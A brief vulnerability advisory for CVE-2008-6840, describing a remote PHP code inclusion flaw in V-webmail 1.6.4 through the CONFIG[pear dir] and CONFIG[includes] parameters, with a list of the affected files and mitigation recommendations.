CVE-2008-6840

Name of the Vulnerable Software and Affected Versions: V-webmail version 1.6.4

Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in specific parameters. The CONFIG[pear dir] parameter in multiple files, including Mail/RFC822.php, Net/Socket.php, XML/Parser.php, XML/Tree.php, Mail/mimeDecode.php, Console/Getopt.php, System.php, Log.php, File.php, includes/prepend.php, and includes/cachedConfig.php, is vulnerable. Additionally, the CONFIG[includes] parameter in prepend.php and email.list.search.php is also affected.

Recommendations: For V-webmail version 1.6.4, consider disabling the CONFIG[pear dir] and CONFIG[includes] parameters in the affected files until a patch is available. Restrict access to the vulnerable files in the includes/pear/ directory and the includes/ directory to minimize the risk of exploitation. Avoid using the CONFIG[pear dir] parameter in the affected API endpoints until the issue is resolved.